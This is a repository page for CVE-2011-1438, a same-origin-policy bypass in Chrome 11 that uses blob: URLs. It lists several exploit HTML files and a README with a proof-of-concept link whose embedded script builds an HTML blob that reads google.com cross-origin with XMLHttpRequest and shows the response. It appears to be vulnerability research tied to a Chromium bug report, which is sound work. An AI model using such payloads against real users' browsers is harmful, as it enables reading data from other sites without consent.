Skip to content

Latest commit

 

History

History

CVE-2011-1438

Folders and files

NameName
Last commit message
Last commit date

parent directory

..
README.md
README.md
 
 
exploit.html
exploit.html
 
 
exploit2.html
exploit2.html
 
 
exploit3.html
exploit3.html
 
 

README.md

bypass SOP with blob:

Mar 2 2011

VULNERABILITY DETAILS

???

VERSION

Chrome Version: 11 stable (Windows XP SP3)

REPRODUCTION CASE

PoC:

<a href="data:text/html,<script>var builder = new BlobBuilder();builder.append(%22%3Cscript%3Ex%20%3D%20new%20XMLHttpRequest%28%29%3Bx.open%28%27get%27%2C%20%27http%3A//www.google.com%27%2C%20false%29%3Bx.send%28%29%3Balert%28x.responseText%29%3B%3C%5C/script%3E%22);var blob = builder.getBlob('text/html');var url = window.webkitURL.createObjectURL(blob);location=url</script>">test</a>

Link: https://bugs.chromium.org/p/chromium/issues/detail?id=74653